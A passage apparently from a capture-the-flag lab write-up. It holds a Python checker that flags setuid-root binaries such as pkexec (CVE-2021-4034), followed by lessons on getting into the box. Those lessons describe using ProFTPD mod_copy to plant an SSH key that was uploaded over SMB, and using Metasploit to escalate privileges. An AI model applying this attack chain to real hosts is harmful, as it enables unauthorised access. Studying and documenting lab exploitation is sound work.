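        if not m or m.group("type") != "-":
            continue
        perm = m.group("perm")
        entries.append({
            "path": m.group("path"),
            "owner": m.group("owner"),
            "setuid": perm[2] in "sS",  # 's' in the owner-execute slot
            "setgid": perm[5] in "sS",  # 's' in the group-execute slot
        })
    return entries


def setuid_root(entries: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Files that run as root for whoever executes them."""
    return [e for e in entries if e["setuid"] and e["owner"] == "root"]


def pkexec_finding(entries: List[Dict[str, object]]) -> Optional[str]:
    """Flag a setuid-root pkexec: the precondition for CVE-2021-4034."""
    for e in setuid_root(entries):
        if str(e["path"]).rsplit("/", 1)[-1] == "pkexec":
            return (f"{e['path']} is setuid root: confirm the installed polkit carries "
                    "the CVE-2021-4034 fix; until it does, chmod 0755 on the binary "
                    "removes the escalation path")
    return None


if __name__ == "__main__":
    found = parse_listing(SAMPLE_LISTING.splitlines())
    for e in setuid_root(found):
        print("[*] setuid root:", e["path"])
    note = pkexec_finding(found)
    if note:
        print("[!]", note)
```

Feed it the output of `find / -perm -4000 -type f -exec ls -l {} +` from the host being reviewed; the parser tolerates the trailing `.` that SELinux-labelled files show in the listings on this page.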
Lessons learned
- When a target runs ProFTPD, it is quite likely that the mod_copy vulnerability will be needed to copy a file and obtain a shell.
- Although searchsploit directly lists a command-execution exploit for ProFTPD 1.3.5, it did not succeed.
- The generated id_rsa.pub public key can be uploaded over SMB to the smbdata directory. Note that smbdata here is a top-level directory under the root, that is, the absolute path /smbdata; ProFTPD is then used to copy (and rename) the file into /home/smbuser/.ssh/, since enum4linux had already revealed that the user smbuser exists on the target.
- This box used Metasploit for local privilege escalation, which felt quite satisfying.